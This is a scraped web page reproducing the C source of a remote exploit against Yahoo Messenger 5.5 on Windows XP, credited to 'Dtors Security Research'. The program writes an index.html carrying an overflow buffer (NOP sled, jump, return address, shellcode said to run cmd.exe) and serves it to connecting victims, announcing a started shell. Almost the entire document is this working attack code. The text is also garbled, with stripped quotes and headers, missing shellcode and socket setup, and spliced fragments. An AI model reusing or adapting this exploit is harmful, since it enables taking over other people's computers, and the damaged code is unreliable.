Remote Yahoo Messenger Exploiter

Remote Yahoo Messenger V5.5 Exploiter * ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]--* Dtors Security Research (DSR) * Code by: Rave * The buffer looks like this * |- */ #include #include #include #include #include /* These are the usual header files */ #include #include #include #define MAXDATASIZE 555 /* Max number of bytes of data */ #define BACKLOG 200 /* Number of allowed connections */ static int port =80; /* library entry inside msvcrt.dll to jmp 0xc (EB0C); */ char sraddress[8]="\x16\xd8\xE8\x77"; /* This shellcode just executes cmd.exe nothing...
Nội dung trích xuất từ tài liệu:
Remote Yahoo Messenger ExploiterRemote Yahoo Messenger V5.5 Exploiter* ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]---* Dtors Security Research (DSR)* Code by: Rave* The buffer looks like this* |-printf(\t\t---------------------------------------------------\n\n);}/* returns the index of the first argument that is not an option; i.e.does not start with a dash or a slash*/int HandleOptions(int argc,char *argv[]){int i,firstnonoption=0;for (i=1; i< argc;i++) {if (argv[i][0] == / || argv[i][0] == -) {switch (argv[i][1]) {/* An argument -? means help is requested */case ?:Usage(argv[0]);break;case P:port=atoi(argv[i+1]);break;case H:if (!stricmp(argv[i]+1,help)) {Usage(argv[0]);break;}/* If the option -h means anything else* in your application add code here* Note: this falls through to the default* to print an unknow option message*//* add your option switches here */default:fprintf(stderr,unknown option %s\n,argv[i]);break;}}else {firstnonoption = i;break;}}return firstnonoption;}int main(int argc,char *argv[]){FILE *fptr;unsigned char buffer[5000];int offset=320; // struct sockaddr_in server; /* servers address information */struct sockaddr_in client; /* clients address information */struct hostent *he; /* pointer for the host entry */WSADATA wsdata;WSAStartup(0x0101,&wsdata);if (argc == 1) {/* If no arguments we call the Usage routine and exit */Usage(argv[0]);return 1;}HandleOptions(argc,argv);fprintf(stdout,Creating index.html: );if ((fptr =fopen(index.html,w))==NULL){fprintf(stderr,Failed\n);exit(1);} e lse {fprintf(stderr,Done\n);}// memseting the buffers for preperationmemset(sd,0x00,MAXDATASIZE);memset(buffer,0x00,offset+32+strlen(shellcode));memset(buffer,0x90,offset);// whe place the a jmp ebp+0x3 instuction inside the buffer// to jump over the eip changing bytes at the en offset//// jmp 0x3// |____________^buffer[offset-4]=0xeb;buffer[offset-3]=0x03;memcpy(buffer+offset,sraddress,4);memcpy(buffer+offset+4,shellcode,strlen(shellcode));// here whe make the index.html// whe open it again if some one connects to the exploiting server// and send it over to the victim.fprintf(fptr,,0x22,0x22);fprintf(fptr,);fprintf(fptr,Oohhh my god exploited\n);fprintf(fptr,,0x22,0x22);fprintf(fptr,);fprintf(fptr,,0x22,0x22,0x22,0x22,0x22,0x22);fprintf(fptr,Dtors Security Research (DSR)\n);fprintf(fptr,Yah000 Messager Version 5.5 exploit....\n);fprintf(fptr,);fprintf(fptr,Contachheaven\x00\x00\x00,0x22,buffer,0x22);fprintf(fptr,.... \x00\x00\x00,0x22,0x22);fclose(fptr); // printf(You got a connection from %s (%s)\n,ine t_ntoa(client.sin_addr),he ->h_name);/* prints clients IP */fprintf(stdout,\nOpening index.html for remote user: );if ((fptr =fopen(index.html,r))==NULL){fprintf(stderr,Failed\n);exit(1);} e lse {fprintf(stderr,Done\n);}fprintf(stdout,Sending the overflow string... );// reading the index.html file and sending its// contents to the connected victimwhile (!feof(fptr)) {send(fd2,sd,strlen(sd),0);numbytes=fread(sd,sizeof(char),MAXDATASIZE,fptr);sd[numbytes * sizeof(char)]=\0;}send(fd2,sd,strlen(sd),0);printf(\n\n\nExploit Done....\n\n\n);printf(A shell is started @ %s lol\n\n\nPress any key to exit theexploit,inet_ntoa(client.sin_addr),he ->h_name);gets(sd);exit(0);}return 0;}